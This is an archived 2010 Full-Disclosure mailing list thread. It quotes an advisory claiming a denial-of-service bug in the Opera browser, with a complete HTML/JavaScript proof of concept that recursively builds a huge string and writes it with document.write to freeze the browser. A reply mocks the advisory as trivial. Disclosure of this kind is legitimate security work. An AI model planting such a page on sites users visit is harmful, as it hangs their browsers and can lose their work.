| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 3 Mar 2010 01:35:30 -0800
From: information security <informationhacker08@...il.com>
To: Jeff Williams <jeffwillis30@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Opera (plenitude String )Denial of Service
Exploit
Thanks .Jeff for all your comment
so how to fix that
On Tue, Mar 2, 2010 at 8:42 PM, Jeff Williams <jeffwillis30@...il.com>wrote:
> You gotta be joking, this is probably the 3000th DoS "advisory" for
> document.write.
>
> Guess what sparky, even Jeremy Brown didn't post that one.
>
> Thus no surprise exploit-db post this kind of shit.
>
>
> 2010/3/3 information security <informationhacker08@...il.com>
>
>> ======================================================================
>>
>>
>> Opera (plenitude String )Denial of Service Exploit
>> =======================================================================
>>
>>
>> by
>>
>> Asheesh Kumar Mani Tripathi
>>
>>
>> # code by Asheesh kumar Mani Tripathi
>>
>> # email informationhacker08@...il.com
>>
>>
>> # company www.aksitservices.co.in
>>
>> # Credit by Asheesh Anaconda
>>
>>
>> #Download http://www.opera.com/download/
>>
>>
>>
>> #Background
>>
>> Opera is a popular internet browser :)
>>
>> #Vulnerability
>> This bug is a typical result when attacker try to write plenitude String in
>> document.write() function .User interaction is required to
>>
>>
>> exploit this vulnerability in that the target must visit a malicious
>> web page.
>>
>>
>>
>> #Impact
>> Browser doesn't respond any longer to any user input, all tabs are no
>> longer accessible, your work if any might be lost.
>>
>>
>>
>>
>> #Proof of concept
>> copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
>>
>> ========================================================================================================================
>>
>>
>> asheesh.html
>> ========================================================================================================================
>>
>> <html>
>>
>>
>> <title>asheesh kumar mani tripathi</title>
>> Asheesh kumar Mani Tripathi
>> <head>
>>
>> <script>
>>
>>
>>
>> function asheesh ()
>> {
>> var i , anaconda = "XXXX"
>> for(i=24;i >0 ;--i)
>>
>>
>> {
>> anaconda=anaconda+anaconda;
>> }
>>
>> document.write(anaconda);
>>
>> asheesh();
>>
>> }
>> asheesh();
>>
>> </script>
>> </head>
>>
>> <body onLoad="asheesh()"></body>
>>
>>
>> </html>
>>
>>
>>
>> ========================================================================================================================
>> Why do you worry without cause? Whom do you fear without reason? Who can kill you?
>>
>>
>> The soul is neither born, nor does it die.
>>
>>
>> #If you have any questions, comments, or concerns, feel free to contact me.
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists